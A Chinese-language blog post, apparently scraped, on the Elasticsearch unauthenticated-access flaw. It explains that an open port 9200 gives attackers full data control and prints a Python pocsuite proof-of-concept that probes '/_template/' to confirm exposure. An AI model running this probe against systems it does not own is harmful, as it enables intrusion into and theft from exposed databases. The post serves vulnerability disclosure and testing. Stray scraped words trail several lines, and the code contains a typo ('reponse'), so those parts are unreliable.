漏洞描述:ElasticSearch是一個基於Lucene的搜索服務器。它提供了一個分佈式多用戶能力的全文搜索引擎,基於RESTful web接口。Elasticsearch是用Java開發的,並做爲Apache許可條款下的開放源碼發佈,是當前流行的企業級搜索引擎。Elasticsearch的增刪改查操做所有由http接口完。因爲Elasticsearch受權模塊須要付費,因此免費開源的Elasticsearch可能存在未受權訪問漏洞。該漏洞致使,攻擊者能夠擁有Elasticsearch的全部權限。能夠對數據進行任意操做。業務系統將面臨敏感數據泄露、數據丟失、數據遭到破壞甚至遭到攻擊者的勒索。html
漏洞評級:高危web
參考連接: 服務器
1. https://www.seebug.org/vuldb/ssvid-62520socket
2. http://webscan.360.cn/vul/view/vulid/3562elasticsearch
3. http://www.oschina.net/news/81125/50-billion-data-deleted-by-elasticsearch-blackmailers分佈式
Elasticsearch 直接對外端口,默認爲9200也可配置爲其餘端口 ,攻擊者直接訪問http://ip:port便可訪問。ui
對數據進行增刪改查直接使用對應的http接口便可。搜索引擎
具體操做請參照本博客的一片Elasticsearch增刪改查接口:http://www.cnblogs.com/KevinGeorge/p/7868823.htmlurl
POC核心代碼:spa
1 def _verify(self): 2 #定義返回結果 3 result = {} 4 #獲取漏洞url 5 vul_url = '%s' % self.url 6 7 #若是設置端口則取端口,沒有設置則爲默認端口 8 import re 9 import socket 10 socket.setdefaulttimeout(2) 11 from pocsuite.lib.utils.funs import url2ip 12 _port = re.findall(':(\d+)\s*', vul_url) 13 if len(_port) != 0: 14 _host = url2ip(vul_url)[0] 15 _port = url2ip(vul_url)[1] 16 else : 17 _host = url2ip(vul_url) 18 _port = 9200 19 20 payload = 'http://%s:%s/_template/'%(_host,_port) 21 22 #檢測漏洞 23 try: 24 print payload 25 response = requests.get(payload,timeout=2) 26 print response.status_code 27 if response.status_code == 200: 28 print "check content" 29 if response.content.find("order") >= 0: 30 result['VerifyInfo'] = {} 31 result['VerifyInfo']['URL'] = _host 32 result['VerifyInfo']['Payload'] = payload 33 else: 34 response = requests.get(payload.replace("9200","9207"),timeout=2) 35 print reponse.status_code 36 if response.status_code == 200: 37 print "check content" 38 if response.content.find("order") >= 0: 39 result['VerifyInfo'] = {} 40 result['VerifyInfo']['URL'] = _host 41 result['VerifyInfo']['Payload'] = payload 42 except Exception,ex: 43 print ex 44 return self.save_output(result)